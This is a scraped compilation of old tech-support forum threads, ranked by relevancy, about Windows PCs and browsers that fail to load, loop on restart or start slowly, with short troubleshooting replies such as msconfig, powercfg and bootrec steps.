I cleaned out my browsing history and my cokies and now I can't stay logged into sites such as Facebook, and Agesanctuary.com; The latter doesn't load fully either. When using facebook and I add a friend the pop-up in which you click ok, just stays up despite clicking "ok". I can stay logged into yahoo, but when writing an email, I have to open another window to send it, as nothing happens when I click send.

I was using EZ trust security suite before and never had any issues, but it expired and my cable company had switched to CA.

I have disabled the windows firewall.
I have allowed Facebook.com and Agesanctuary.com under internet options privacy.
I have downloaded and updated IE7

My operating system is XP sp2

Sincerely,
Crjensen4

A:wont stay logged in - and some site doesnt load fully

Well - I solved it myself.

Uninstalled CA Security suite - and everything is now working as it is supposed to....

http://www.techsupportforum.com/forums/f56/wont-stay-logged-in-and-some-site-doesnt-load-fully-268535.html
Relevancy 70.95%

HI i had avant and then wen i had gotten some infected stuff on my computer i uninstalled it and wen i reinstalled it thay had a new version and it wont work on my computer. I found out that thingy that comes up first is a splash screen so what i mean is tha splash screen comes up and then stays there and does nothing and i cant get into that browser. I wouldnt mind using a different browser but i had bookmarks on there so either i would like to.........

1. find out how to make it work so i can use it as i do like that browser.

or

2. is there some way to get my bookmarks from it and then move them into a new browser?

Thanks guys/girls.
Appreciate it mucho!!!!!!

A:Avant Browser Doesnt Load Just That Splash Screen Thingy.

Hi TRISTEN,If you would like to change browsers, Firefox is a great alternative.Importing your Bookmarks is an easy task. See this article; Import Bookmarks.

http://www.bleepingcomputer.com/forums/t/84752/avant-browser-doesnt-load-just-that-splash-screen-thingy/
Relevancy 70.52%

Hi. A weird problem just happened to me when I tried to restart my machine (Gateway 710X, w/XP home) via Start/ Restart. It restarts normally, but it totally hung on the Gateway screen and Windows won't load. I tried F8 and F10, but they don't work either. I also tried the reset button, but the same thing happened. I finally just shut it down and turned it back on and it worked. It only happened once so far, so is it possible it could be a "glitch" or should I be worried? Thanks

Could anyone give me any suggestions.

A:XP won't load on restart?

Usually I tell people not to be worried until they have the same issue and they have actually powered down the PC and left it unplugged for a few minutes. By doing a restart/or a reset button without pulling the plug you could have just had something stuck in memory that a soft reset could not fix.

Give it a few turn offs and pull the power plug at least once and if it still happens give us a few more specifics

https://forums.techguy.org/threads/xp-wont-load-on-restart.369021/
Relevancy 70.52%

Hi. I am having a weird problem with my machine (Gateway 710X, w/XP home) whenever I try to restart it via Start - Restart. It restarts normally, but it freezes on the Gateway screen and Windows won't load. I tried F8 and F10, but they don't work either. I also tried the reset button, but the same thing happened. I finally just shut it down and turned it back on and it worked.

Could anyone give me any suggestions.

http://www.techsupportforum.com/forums/f10/xp-wont-load-after-restart-56287.html
Relevancy 70.09%

Today I booted up my computer and got a screen saying something went seriously wrong with my computer and that I should repair it from an installation disk. I load up windows onto a USB, boot it and click the repair option. It's been about half an hour and nothing has shown up. Is it still loading or perhaps something is very wrong with my PC?

A:Computer will not boot, asks for installation disk. Repair doesnt load

Hi there, Welcome to SevenForums.com.

Repair can sometimes take a long while. What screen does it get stuck on when trying to repair?

http://www.sevenforums.com/bsod-help-support/271890-computer-will-not-boot-asks-installation-disk-repair-doesnt-load.html
Relevancy 70.09%

When I turn on the computer it opens with a black screen (before windows loads) and there are two options
. Microsoft Windows XP
. Microsoft Windows XP
(If I pick the 1st option windows load)
(If I pick the 2nd option in the list windows does not load)
In other words I believe the BIOS is asking me to pick one. I hit enter on the first option and windows loads right to the desktop. My question is how can I set the computer to automatically pick the first option so I do not have to manually?
This started after I reformatted the hard drive and reinstalled the XP Home OS

This computer is a Dell Dimension 2400 using a valid MS XP Home OS key.

It is like there is two installs of the OS but I do not believe so as when I reinstalled the OS I did a complete reinstall
Thanks for all help

A:How to make Windows XP load right into Windows

Try this . . Click on Start . . Run . . type msconfig . . click on the Boot Ini tab and click on Check all boot paths . . if it comes back with one is invalid, click Fix invalid boot paths

http://www.techsupportforum.com/forums/f10/how-to-make-windows-xp-load-right-into-windows-434570.html
Relevancy 69.66%

I can't seem to get Windows 7 SP1 to load a driver for an HP printer that is on my home network. My laptop sees it but won't let me make it the default printer or load a driver so that I can link to it wirelessly. I restored my laptop back to windows 7
because Windows 10 was moving too slow. I only have 4gigs of memory, and windows 10 probably runs better with 8gigs of memory.

https://social.technet.microsoft.com/Forums/en-US/f52ee902-9022-4792-a1df-5a658bebc843/how-can-i-get-windows-7-sp1-to-load-a-print-driver-thatamp39s-compatible-with-the-hp-printer?forum=w7itprohardware
Relevancy 69.66%

Heya,

I have a document in which I keep a log of all my jobs to do at work. Is there any way I can make this document load automatically once I logon to Windows (XP-Pro)?

Or, even stranger, can I make this document my desktop, without having to take a new screenshot every time I make a change to it..? Just a thought, probably the first way is far easier.

Thanks!

Alex

A:How To Make Something Load At Startup

I don't know a way to do exactly that.You can display a picture file on your desktop and you would have to do a sceenshot to accomplish that, but you can make a keyboard shortcut to it, opening it with the press of a key or combination of keys.If that will work for you there is a small freeware ap that will let you do so named Copernic WinKey which you can download here:http://www.copernic.com/en/support/faq-winkey.html

http://www.bleepingcomputer.com/forums/t/60197/how-to-make-something-load-at-startup/
Relevancy 69.66%

Hi My PC went off as a result of a power cut and now when i try to load the PC it goes to advanced startup menu but no matter and while BSOD restart trying load to XP which selection i go for I get a BSOD pop up really quickly and then the computer restarts I have tried to use XP emergency recovery boot disc and it says that a file quot lt lt windows root system hal dll quot is either missing or corrupt I have tried the XP setup disc BSOD and restart while trying to load XP and when I try the recovery console it only gives me my d and when i select that I get a different BSOD which stays and shows PAGE FAULT IN NON PAGED AREA x If I try to do an overwrite install of XP from the disc then as soon as I agree to the license agreement it give me another BSOD This time is is BAD POOL CALLER x C Thinking it may be RAM related I have tried to test the RAM by having just one just in at a time and alternating between them and I get the same BSOD loop I followed a guide at How to Identify a Bad Memory Module on Your PC - Support com and tried to load the Memtest software onto a USB but my Bios does not let me choose a removable drive as the boot device The only other thing I could think that could be causing it is the HDD but the bios is showing the drive correctly and theres a lot of stuff I would like to save from the drive I cant get into Windows or DOS and am really at a loss now so any tips would be greatly appreciated Thanks

A:BSOD and restart while trying to load XP

Hi

please follow these posting instructions to help us find the problem!

tom

http://www.techsupportforum.com/forums/f299/bsod-and-restart-while-trying-to-load-xp-629831.html
Relevancy 69.66%

My desktop (Windows XP) has just become unresponsive. It will not load my anti-virus, and continuously reboots itself. I eventually got my antivirus to load, and it's scan revealed 2 malware infections which it then removed. (I run Avast) I also ran Malwarebytes and it found nothing.

I have attempted system restore through F10 with no success, and doing it through System Recovery shows I have no save points to go back to. I have NO Windows CD to restart from.

Safe mode with Networking sits on the black screen, where it scrolls through all those DRIVER files, and then just reboots the computer normally (Safe Mode doesn't work either) and rebooting from Lats Known Good Config. also did nothing.

Help me? XD

Relevancy 69.66%

when i turn my computer on it says to hit F1 to continue or F2 and when i type F1 it just beeps and will not let me do it. i push F2 move something, move it back, save and then i hit F12 and finally after 800 times i get it to finally boot windows xp home sp2 for awhile then dumps me again. any ideas or suggestions would be great. my computer has been starting to act real funny by not allowing me to access things saying i dont have permission to do it. its getting real squirly. thanx in advance for any help.

A:During Reboot My Windows Xp Will Not Load Tries To Load My Old Me

Hi, did you set up XP on another hard drive to ME? If so you will need to go into your bios and set the hard drive XP is on to the top.

http://www.bleepingcomputer.com/forums/t/128741/during-reboot-my-windows-xp-will-not-load-tries-to-load-my-old-me/
Relevancy 68.8%

Hi everyone,
I have been working on this my site today I was at a friends and she has a older computer I think its serial # 0000003 anyway I looked up my site it took forever for the pictures to load in fact i would not waited if it wasn't my site is there anything I can do to make them load faster? thanks Rehia

PS I'm giving Dave a break.

Relevancy 68.8%

Does anyone know of any ways to make Opera load quicker. It seems to start so much slower than IE or Firefox. I have reduced the size of the disk(2MB) and memory(4MB) caches. I've also trimmed down the fonts folder. It didn't really make a noticeable difference in the load time though. Does anyone know of any other tweaks/tricks to make Opera load quicker?

http://www.bleepingcomputer.com/forums/t/13191/make-opera-load-quicker/
Relevancy 68.8%

Hi guys Hoping you can help me I m pretty sure I picked up a in loop restart load on WinXP PC - virus a few days ago - I have just returned from holiday to find my PC restarting on load I remember AVAST gaving me a warning then there was a pop-up Malware Virus PC in restart loop on load - WinXP Scanner I managed to close that by ending the process I PC in restart loop on load - WinXP ran AVAST which picked up a few items and told me to re-scan on boot When rebooting it proceeded to discover a heap of problems and asked if I should delete - being naive I clicked Delete All and continued working on my other system It deleted quite a few issues before loading up After use I shut the computer down and I have only just returned and started that machine up It gets to the load-up Windows page background with icons loaded and goes black and restarts - as if it s stuck in a loop I somehow managed to get to a blue screen saying A problem has been detected and windows has been shut down to prevent has been shut down to prevent damage to your computer It also said something about aspwSP sys amp STOP x E etc etc Apologies for the vague description problem as I restarted without writing down the displayed problem results I m running Win XP Can t remember which version and I can t get to the start menu to see I have Avast Home and Malware Bytes installed I havent added any new hardware for over a year and the computer isn t even warm when operating I tried restarting in Safe mode and Last known configuration with no success If you can shed a light it would be greatly appreciated Thankyou Warren

http://www.bleepingcomputer.com/forums/t/378685/pc-in-restart-loop-on-load-winxp/
Relevancy 68.8%

Hello allo thanks all for this superb forum I have been having a restart reboot problem with my PC for some time now I originally attributed the problem to Skyrim game since it used to only do it while playing this particular game Now i can get it to do it using winrar furmark pretty easily within minutes once took only minutes Computer is around years old load reboot/restart under Random now I used to play Random reboot/restart under load BF for hours on without any problem in the first year I've tested a few things i could Random reboot/restart under load think of - monitored eye view voltages and temps using CPUID HWMONITOR at idle and during tests - no reported events ever on any of the restarts from the even viewer logs i only get a unexpected shutdown wihtout proper blablabal - tried to overheat stress GPU without any success in getting it to crash R i went up to c which it never actually reaches during normal setup by lowering fan speed and it never crashed I can only get it to reboot if i use both CPU and GPU loading at the same time i've ran GPU test for hours on without any problem haven't ran anything other than winrar on a very large file folder as far as cpu is concerned So now i do not know what else to test would like very much to get some insight Ah yes my PSU has been making some weird digital noise since day i don't hear it that much anymore since i'm used to it but it is on and off it seems to change with what i am doing on the computer sure it comes from the PSU i've isolated it by ear about a year ago probably unrelated neway Here is quick component list of computer Asus Sabertooth FX r FX x crucial pc - R PSU is a corsair HX i believe samsung pro ssd nothing is overclocked or ever was not that i needed it neway the case is a full tower with alot of clean free space filters and many fans thanks

A:Random reboot/restart under load

Also, it seems like it is getting more frequent.
Used to be after 1-2 hours of gameplay
now i can get it after only 10 minutes

i think .... damn random problems!!

http://www.bleepingcomputer.com/forums/t/618101/random-rebootrestart-under-load/
Relevancy 68.8%

This is another desktop In which I was trying to help solve the original problem and now they re both the same way and I feel horrible about it The original computer kept restarting and eventuallywith the help of members here I assumed it was a bad video XP won't restart. continuous help, Please Computer / load, card or video drivers SO I took the DVD-ROM and the Hard drive out to allow they to continue using the DVD drive for work programs and to try to get some files from the hard drive I installed the DVD Rom and remembered that it would sometimes not open and it would spin very fast and read slowly but it quot worked quot I put Please help, Computer / XP won't load, continuous restart. it in and installed some drivers for it The Hard drive froze the computer so i immediately took it out and didn t try again The computer worked fine for about dsays then I was called and they said now the nd machine is doing the same thing Now instead of stoping on something about ivpmon this machine freezes and restarts at quot XXXXXX System Config System quot I am comepletely clueless now and like I said I feel so bad about this i thought i under stood and obviously did not nbsp

Relevancy 68.37%

Windows Update Won't Load--gets error-"This page failed to load". My system=32 bit operating system which is Vista Ultimate.

A:Windows Update Won't Load--gets error-"This page failed to load"

Hello sgibbins,
Try here, people have had some good results doing this. please post your results. Good luck.

JSI Tip 2805. Windows Update 'Cannot Display Page'?

http://www.vistax64.com/windows-updates/231313-windows-update-wont-load-gets-error-page-failed-load.html
Relevancy 68.37%

Backstory skip if you need I'm fixing someones laptop It was slow and taking minutes to startup i did the usually virus scan and restarted then it was stuck in wont Boot Repair load, load, CD Automatic Windows Loop wont an auto repair loop I used a windows Install CD from microscoft None of the options in it would work install key doesnt match reset missing partition Windows wont load, Boot CD wont load, Automatic Repair Loop image recovery cant find an image restore no restore point Windows wont load, Boot CD wont load, Automatic Repair Loop etc Used command prompt did stuff like bootrec bcdedit diskpart and chkdsk After it ran chkdsk it finally loaded windows I reset reinstalled the OS completely Fixed restarted running smooth Owner said it was working great for a day then after turning it back on it was in an auto repair loop Now It's stuck in a preair loop I can't even boot from the CD Have it configured in the bios it shows the the blue windows logo then the screen goes black for minutes and a blue screen flashes for second saying Your PC ran into a problem and need to restart Collecting some info complete search online for error x a The weird thing is Windows disks boot fine but it's not compatible And if I physically remove the HDD it will boot into the windows CD So I put the HDD back in while still at the command prompt and it wont take my commands in related to the C I get a System cannot find the drive specified I also tried hooking upp the HDD to my PC SATA it shows in explorer but just right clicking it crashes explorer exe Drivers for it fail to update Any idea what is going on How can I get it to boot from the CD or get the command prompt to find C drive or start up when booting with the HDD in the laptop Specs windows core i gb ram TB HDD Years old no important files

A:Windows wont load, Boot CD wont load, Automatic Repair Loop

UPDATE:

I got a windows 8.1 disk made and it allowed me yo boot from the CD, but it's SLOOOOW, it takes minutes to load reset or w.e (none of them still work), or open the command prompt.

I ran chkdsk /f /r /x but it didnt help. chkdsk /r ends with:
"A disk read error occurredcc0000185
Insufficient disk space to fix the Usn Journal $J data stream."

Before when I ran it, I'm pretty sure it let me restart and booted into windows, not now.

Next I tried bootrec.
/fixmbr - succesful
/fixboot - succesfull
/rebuildBCD - Total identified Windows installations: 0
/scanOS - Total identified Windows installations: 0

Next bcdedit
Nothing worked "The boot configuration data store could not be opened. The requested system device cannot be found."

Next sfc /scannow
"There is a system repair pending which requires reboot to complete. Restart Windows and run sfc again."
Then sfc /SCANNOW /OFFBOOTDIR=c:\ /OFFWINDIR=d:\Windows
"Windows resources protection didnt find integrity violations"

BCDBoot c:\WindowsFailure when attempting to copy boot files

Next diskpart - but I forgot what I did before that may have worked. All i can remember is I had to select a disk or volume, and do something with it.

http://www.bleepingcomputer.com/forums/t/529061/windows-wont-load-boot-cd-wont-load-automatic-repair-loop/
Relevancy 68.37%

When I start up my pc I get a screen that says quot We apologize for the inconvenience but Windows did not start successfully a recent hardware or software change may have caused this amp etc quot Then I am offered with a bunch of options to either Start in Safe Mode Safe Mode with Networking Safe wont load wont Computer restart/windows Mode with Command Prompt Start Windows Normally Last Known Good Configuration None of them work the safe mode ones show a bunch of lines of code as per normal when starting up safe mode then it freezes and stops and eventually goes back to the screen mentioned above Same for and Computer wont restart/windows wont load windows blue loading bar screen comes up then the screen turns black and nothing After a few mins my computer restarts again and goes back to the screen mentioned above Prior to my computer not being able to restart load windows I had some pop up vundu trojans i was trying to remove Did some research after about hours finally removed it A couple days after i started receiving quot generic host process error quot Something to do with explorer exe program So i ctrl alt del and explorer exe was taking up cpu usage At this point i tried to minimize task manager and my computer froze up I waited about an hour came back and still nothing so i manually turned off my computer and turned back on And now it will not restart I have no idea where my windows xp disks are or even if i have them I found what appears to be the solution to my explorer exe problem here gt http support microsoft com kb However as i said i cannot boot up my computer at all I was rummaging through a box of disks and found what appeared to be back up disks i threw one in and up came MSDOS is there a way to boot up windows in safe mode from there Any suggestions and help would be greatly appreciated Thanks By the way i am using windows XP service pack i believe cant recall exactly nbsp

https://forums.techguy.org/threads/computer-wont-restart-windows-wont-load.640393/
Relevancy 68.37%

i tried putting all the files on to the usb drive however, the system doesnt boot from the usb drive! how do i make it so its bootable. thanks in advance

A:How do you make a USB drive bootable so I can load W7 on a netbook?

Install Windows 7 on Asus Eee PC 900! ? multimolti’s Techblog

check here....

http://www.sevenforums.com/general-discussion/1460-how-do-you-make-usb-drive-bootable-so-i-can-load-w7-netbook.html
Relevancy 67.94%

I can grow a beard waiting for my taskbar to load which only has my Nod antivirus and sound icon on it I just Taskbar restart load on to takes forever looked at MSCONFIG startup and there are only things ticked - Nod antivirus and Clocktray skins which is how I want it so I don t see why it takes so long to load those little programs Also I have a hard time opening most if not all of my programs have to keep Taskbar takes forever to load on restart clicking until they finally open up and then there are like - windows of the same program open because of me clicking and clicking to get them to open Oh yes Taskbar takes forever to load on restart and sometimes closing my programs also takes a long time Even my task manager takes forever to load when I am trying to close a program if it won t close with right-clicking My PC is a fairly new Dell WinXP Pro with SP I think I got rid of spyware and adware with running No Adware Lavasoft Adaware AVG antispyware Pest Patrol etc Any insight as to this problem Thanks nbsp

https://forums.techguy.org/threads/taskbar-takes-forever-to-load-on-restart.548404/
Relevancy 67.94%

I finally got a new computer after having my old one for 6 years. It has Windows Xp on it. When I finally get everything I need installed on it, I install Norton Antivirus on it. After doing the update, it was required to restart. After I restarted, my icons and toolbar appeared on my screen as normal. Then after a minute maybe, it disappeared.The only thing that would show up is my wallpaper. I tried right clicking, pressing the windows button on my keybard, and even restarting again a few times. It all came back to the same outcome. I tried finding posts on it but I didnt see one. I'm sorry if I did miss one. Could anyone give me some ideas as of what to do? it would really help.

http://www.techsupportforum.com/forums/f10/icons-and-toolbar-wont-load-after-restart-wtc-111045.html
Relevancy 67.94%

hi i am facing this problem from last 2 weeks my pc and my roommate lab have this similar problem both get restated when there is some heavy load.

i am using wix xp sp2 home and he is using wix xp sp2 pro
both have kaspersky anti virus.

i got some little info that it's came from torrent and it's store between it c: and d: drive and it's transfer itself to over the lan machines as don't know how it can.

kaspersky say's it a clean machine.

already formated C: part 2 times.

i am running with duel core, 1gb ram and nvidia gp card.

the main thing is problems are same in my pc and his laptop.

hope u ppl can help us out.

note: we both use torrent very often and frequently you can see in last 2-3 months we lived on it.

waitng to hearing from ur side thanks.

A:Pc got restart on heavy load (sum says its torrent lan virus)

plzz help me..

https://forums.techguy.org/threads/pc-got-restart-on-heavy-load-sum-says-its-torrent-lan-virus.687690/
Relevancy 67.94%

Hey there I've just recently bought a new PC and weeks later I'm having issues with it already Here's the config Motherboard - LGA H MSI H M-P B Processor - Intel Core i - RAM - DDR GB x HDD - Hitachi Deskstar HDS DLE GB rpm Graphics - VGA AMD Radeon Power supply - W So anyways everything worked like a charm first week or so I was well impressed Then I had some issues with my surround system after trying everything possible software-wise I got talked into re-installing Windows to fix the sound problem I was having with the after installing won't load CCC issue; restart. desktop AMD speakers Foolish decision it turned out to be not only it didn't help me solve the sound problem but now I can't even install Catalyst Drivers anymore Here's where the problem is after I re-installed Windows Ultimate x all clean and proper of course and applied all the updates fixes through Windows Update Action Center etc - I need to install AMD Catalyst Control Center in order to make my graphics show up on device manager work When AMD CCC installing issue; desktop won't load after restart. I install it and it asks for restart after so it can complete the install and apply it my Windows won't load proper Firstly a black screen appears shortly intead of standard quot Welcome quot screen and then few moments later desktop appears with no taskbar or any icons on it I'm not even able to opet task manager or anything my whole computer seems to freeze up I have tried installing graphics drivers from the original disc I received with my card I've tried downloading it manually and through the Windows Update as well no matter what way I install it after the reboot my desktop won't load my Windows doesn't start proper I have installed different versions of Windows Ultimate ever since I've tried pretty much everything that crossed my mind and I'm still rather clueless about the whole thing Does anyone know what the problem might be and or how can it be fixed I can't play a single game meanwhile matter a fact I can't even get my graphics to show up under device manager until I install AMD CCC Sorry for the long text and please pardon my choppy english it's not my mother tongue Thanks in advance

A:AMD CCC installing issue; desktop won't load after restart.

what version of the CCC were you trying to install

If it was from the Disc you should have just went to the site and if you got the 12.7 beta you are also better off going 12.6 i have new 7900 cards and they give me some issues in certain games but nothing to problematic

i would go with the 12.6 or 12.5 12.4 isnt a good driver or 12.7 probally end up skipping it and waiting on a 12.8

As for the install issue it happens on the version of the driver used sometimes it finishes in red or goes into yellow indicating it wasnt installed correectly

also im not sure if your conflicting with any intel hd graphics

http://www.sevenforums.com/drivers/244807-amd-ccc-installing-issue-desktop-wont-load-after-restart.html
Relevancy 67.94%

if my laptop fall asleep, it doesnt want to wake up later. i push the on button and the screen stays black. i was said to do a bluescreenview with nirsoft, so i did. there was 2 red files in the order C:/Windows/Minidump. (I send them with this question) What should i do now?error.txt

A:It doesnt wanna wake up

Try this first go to Start type in CMD locate CMD.exe right click on it then select "Run as Admininstrator"

In the command prompt copy and paste or type in then hit enter.

Code:
powercfg.exe -h off
Reboot then go back to command prompted just as you did before by following the steps above in the command prompt copy and paste or type in then hit enter.

Code:
powercfg.exe -h on
let us know if this helped.

http://www.techsupportforum.com/forums/f299/it-doesnt-wanna-wake-up-837609.html
Relevancy 67.94%

I have laptop with xp pro. The other day it woulnt reboot, instead it would reboot over and over.
I tried installing xp pro again even tho i didint want to loose 30g of media but I didint find another fix.
When I try to install Xp again it tries the gives me an error says disk.sys error, can not complete install.

Now I got a new hardrive thinking it was bad, and I get the same error.

What could be the problem, and why cant i access the drive on my other laptop via usb 2.0 box either, It seems like its my pc not hardrive.

Thnx in advance
Chewy

http://www.techsupportforum.com/forums/f10/xp-pro-doesnt-wanna-start-up-11834.html
Relevancy 67.51%

I have windows xp pro, and my computer is pretty smooth and fast except for starting up or shuting down, because of norton antivirus 2006, I have test it several times, which I still need protection for my computer, therefore is there a faster way for my computer to load norton at startup?

A:Is There A Way To Make Norton Antivirus Load Faster On Startup?

No u can not.

NAV2006 is way more system hog, just cause of security.
It boots autoprotect, and protectes files, it runs a automatic liveupdate at startup and that takes time to.

and some other several stuff.

http://www.bleepingcomputer.com/forums/t/57754/is-there-a-way-to-make-norton-antivirus-load-faster-on-startup/
Relevancy 67.51%

Hello,

With my Windows 7 Home Premium I use Microsoft Word Starter 2010, which came preloaded to my laptop. I save much information in it's standard 'document' page. When I click on a saved document, after about 5 seconds it displays the small window "Microsoft Word Starter 2010" and goes through some process, telling me it is 'starting', 'processing' and takes a further 10 to 20 seconds for the actual document to open. This happens even when opening a blank document. Is there any way that I can speed up the opening of a document.

Regards.

A:How Do I Make Microsoft Word Starter Load Faster

Hi. Welcome to the forums.
Maybe you could use these tips?
How to Speed Up Microsoft Office: 8 Tips | TechJaws.com

-Darren

http://www.sevenforums.com/microsoft-office/268346-how-do-i-make-microsoft-word-starter-load-faster.html
Relevancy 67.51%

Always something. Fix one Pc ..then the other one goes nuts. I don't get it. Went on vacation and it was working fine. Come home and BAM! Nada.

My Pc powers up. Shows the mobo screen. Then displays the black XP boot screen with the scrolling blue bar at the bottom. I gets to where its ready to go to the user log on screen, but never makes it. Auto restarts back to power up and the mobo screen. Does this over and over again.

There are no errors displayed.

Any guesses?

A:XP Load Screen then Auto Restart...never fully boots

Can you boot to safe mode? Press F8 as it completes the bios checks (memory checks etc)

http://www.techsupportforum.com/forums/f10/xp-load-screen-then-auto-restart-never-fully-boots-58897.html
Relevancy 67.51%

hi i am facing this problem from last 2 weeks my pc and my roommate lab have this similar problem both get restated when there is some heavy load.

i am using wix xp sp2 home and he is using wix xp sp2 pro
both have kaspersky anti virus.

i got some little info that it's came from torrent and it's store between it c: and d: drive and it's transfer itself to over the lan machines as don't know how it can.

kaspersky say's it a clean machine.

already formated C: part 2 times.

i am running with duel core, 1gb ram and nvidia gp card.

the main thing is problems are same in my pc and his laptop.

hope u ppl can help us out.

note: we both use torrent very often and frequently you can see in last 2-3 months we lived on it.

waitng to hearing from ur side thanks.

A:Pc got restart on heavy load (sume says its torrent lan virus)

so what you are saying is that you PC restarts itself when it is under load? when you say underload do you mean playing games?

this doesnt neccessarily mean you have a virus, it could be that the powersupply in your machine is failing, or your cpu is overheating. what are the specs on your machine?

https://forums.techguy.org/threads/pc-got-restart-on-heavy-load-sume-says-its-torrent-lan-virus.687679/
Relevancy 67.08%

I bought some china no name usb hub,and when i plugged into my computer i getting message "cannot be recognized".So i plugged it into other computer and there is working,but there when i put usb stick it then usb stick doesnt work(which works when is plugged directly).So i took hub to shop where i bought it and test it on their computer and it work perfectly,even with usb stick.
Seller said i should bring my computer to repairing but i think that is stupid suggestion beacuse all my other usb devices works perfectly,so why should i took entire my computer for one component?I can bet other usb hub would work perfectly,but bald seller said i should take that one beacuse it's cheapest.
So any idea why that error "cannot be recognized"apper only at my main computer?

A:Usb hub doesnt wanna work on my computer

I've seen this before. Check your bios. I'm betting that the usb is turned off. It happens.

http://www.techspot.com/community/topics/usb-hub-doesnt-wanna-work-on-my-computer.85836/
Relevancy 66.65%

The title says it all! Basically, I've been using AdFender (which I believe was recommended by this site) and it was working great. However, it seems that certain sites (like google and youtube) will only load as an https now, even if I'm logged out of the account. AdFender doesn't work on https sites, so now I'm bombarded with commercials and banner ads on videos: It's absolutely terrible!

So, can anyone either:
1. Recommend an adblocker that works on https sites?
2. Tell me how to run sites that default to https as an http?

Thanks for your time!

ADDITIONAL INFO: I forgot to mention that I am using Windows 8.1 and have had this problem on both Google Chrome and Internet Explorer.

A:How to block ads on https sites OR make the site load as an http?

I don't know about AdFender. I've been using AdBlock for years and I think a lot of BC members use it.

http://www.bleepingcomputer.com/forums/t/543366/how-to-block-ads-on-https-sites-or-make-the-site-load-as-an-http/
Relevancy 66.65%

As the default Profile Options. How can I stop this?

Thanks in advance.

A:Whenever I go log off/restart computer my User Profile doesn't load and it starts....

https://forums.techguy.org/threads/whenever-i-go-log-off-restart-computer-my-user-profile-doesnt-load-and-it-starts.827222/